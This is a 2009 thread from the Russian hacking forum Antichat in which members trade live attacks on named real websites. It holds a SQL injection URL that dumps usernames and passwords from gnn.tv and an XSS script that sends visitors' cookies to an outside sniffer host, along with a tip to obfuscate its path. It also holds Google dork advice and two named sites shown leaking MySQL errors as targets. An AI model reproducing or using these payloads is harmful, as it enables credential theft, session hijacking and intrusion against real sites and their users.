Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
31.03.2009, 21:21
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
http://www.gnn.tv/videos/video.php?id=-1+union+select+1,2,3,4,5,6,7,8,9, concat_ws(0x2F,usr_name,usr_pass),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33,34+from+gnn_users--
Сурс морды смотрите
<div class="input_wrap"><input type="text" name=" usr_name" value="user name" onfocus="if(this.value=='user name')this.value='';" onblur="if(this.value=='')this.value='user name';"></div>
<div class="input_wrap"><input type="password" name=" usr_pass" value=""></div>
Я уже несколько раз обращал на это внимание. Прямой связи тут конечно нет, но нужно учитывать “человеческий фактор”
Последний раз редактировалось ElteRUS; 31.03.2009 в 21:28..
|
|
|
31.03.2009, 21:36
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Такс... Спасибо) Но к сожелению пассы к админке не подошли( Может еще таблицы найдем какие-нибудь) ?
|
|
|
|
31.03.2009, 21:40
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
Эм...если я не ошибаюсь, то там бйсик авторизация и пароли для входа в админку хранятся в файле htpasswd, а не в БД!
(http://gnn.tv/admin)
Последний раз редактировалось -m0rgan-; 31.03.2009 в 21:47..
|
|
|
|
31.03.2009, 22:12
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
Нашел сайт, на котором в поле личных сообщений(социалка) выполняется html код, а следовательно и javascript
Недолго думая залил xss снифер на хост, составил ссылку
<script>window.location.href='http://htos.ru/sniffer/s.gif?'+document.cookie;</script>
проверил ссылку на лок. компутере - работает, средиректил на настоящую фотографию.
начал тестировать на сайте - пошли первые рога.
Отчеты не приходят, хотя скрипт съедает чисто.
Как это лечится?
Снифер брал с http://pashkela.narod.ru/sniffer.rar
|
|
|
|
31.03.2009, 22:21
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
Мб, стоит зашифровать путь к снифферу?
|
|
|
|
31.03.2009, 22:27
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
-m0rgan-, вы гений.
Точно. Нужно было зашифровать строку.
2 месяца непрерывной е**ли с сайтом и все так просто...
Спасибо, -m0rgan-.
|
|
|
|
31.03.2009, 22:53
|
|
Banned
Регистрация: 14.01.2009
Сообщений: 515
Провел на форуме:
1996429
Репутация:
468
|
|
Я сталкнулся с такой проблемой. Я с трудом нахожу бажный скрипты с инекцией. Прочитал всякие faq по sql инжекшен да я и php с Mysql знаю нормально впринципе, но вт что-то с поиском не очень. Поделитесь соображениями как искать..Очень редко попадаются скрипты с уязвимостями.
|
|
|
|
31.03.2009, 23:01
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
2Krist_ALL тут не раз уже обсуждалась эта тема, всем вопросам ответ гугл, вбей в поиск например .php?id= или .php?news= ну или как тебе угодно, конечно можешь сразу поискать MySql error in бла бла бла..но это уже паблик и не факт что сайт либо похеканый давно либо уже в бд не существует инфы для сайта, но для тренировки сойдет
|
|
|
|
31.03.2009, 23:08
|
|
Banned
Регистрация: 14.01.2009
Сообщений: 515
Провел на форуме:
1996429
Репутация:
468
|
|
Так и делаю. Но бажных скриптов почти не попадается! Все стойкие
|
|
|
|
31.03.2009, 23:11
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
Krist_ALL, позволю поправить Gorev'a.
Для поиска по урлу в гугле используется команда inurl:
Пример:
inurl:news.php?id=1
И пройдя по первой ссылке
(http://ocenshik.mostpp.ru/news.php?id=1)
Видим бажный скрипт:
Код:
http://ocenshik.mostpp.ru/news.php?id=1'
Код:
Warning: mysql_result(): supplied argument is not a valid MySQL result resource in /bhome/part1/01/mtpp/mostpp.ru/www/ocenshik/txh/part/news.txh on line 95
Warning: mysql_result(): supplied argument is not a valid MySQL result resource in /bhome/part1/01/mtpp/mostpp.ru/www/ocenshik/txh/part/news.txh on line 97
Warning: mysql_result(): supplied argument is not a valid MySQL result resource in /bhome/part1/01/mtpp/mostpp.ru/www/ocenshik/txh/part/news.txh on line 98
Warning: mysql_result(): supplied argument is not a valid MySQL result resource in /bhome/part1/01/mtpp/mostpp.ru/www/ocenshik/txh/part/news.txh on line 99
Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in /bhome/part1/01/mtpp/mostpp.ru/www/ocenshik/_functions.php on line 88
по первой ссылке
(www.globalwaterfoundation.org/news.php?id=1)
Видим бажный скрипт:
Код:
www.globalwaterfoundation.org/news.php?id=1'
Код:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/gloh2o/public_html/news.php on line 190
И так далее...
Последний раз редактировалось -m0rgan-; 31.03.2009 в 23:16..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
